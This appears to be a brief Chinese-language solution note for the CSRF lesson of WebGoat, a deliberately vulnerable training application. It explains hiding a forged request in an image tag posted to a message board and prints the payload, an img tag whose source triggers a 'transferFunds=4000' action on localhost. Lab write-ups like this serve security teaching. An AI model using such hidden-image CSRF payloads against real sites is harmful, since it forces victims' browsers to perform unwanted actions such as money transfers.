1、CSRF
介绍参见:http://blog.csdn.net/yu422560654/article/details/7789167
题意:书写一个URL诱使其他用户点击,从而触发CSRF攻击。
解题:以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,其他用户一旦点击图片,就会触发一个CSRF事件。
代码如下:
<img src="http://localhost:8080/WebGoat/attack?Screen=356&menu=900&transferFunds=4000"/>